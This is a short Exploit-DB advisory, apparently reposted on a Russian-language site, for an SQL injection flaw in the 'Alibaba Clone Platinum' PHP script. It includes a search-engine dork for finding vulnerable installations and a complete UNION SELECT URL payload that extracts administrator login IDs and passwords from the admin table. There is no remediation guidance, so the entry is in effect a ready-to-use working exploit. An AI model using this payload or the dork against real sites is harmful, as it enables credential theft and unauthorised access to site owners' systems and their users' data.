- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12612
- Проверка EDB
-
- Пройдено
- Автор
- COBRA_21
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-05-15
Код:
-------------------------------------------------------------------------------------------
Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: [email protected]
Script Home: http://www.alibabaclone.com/
Price: $699 USD
Dork: inurl:buyer/about_us.php?BuyerID
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/buyer/about_us.php?BuyerID=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,concat%28LoginID,0x3a,password%29,38,39,40%20from%20admin
-------------------------------------------------------------------------------------------- Источник
- www.exploit-db.com
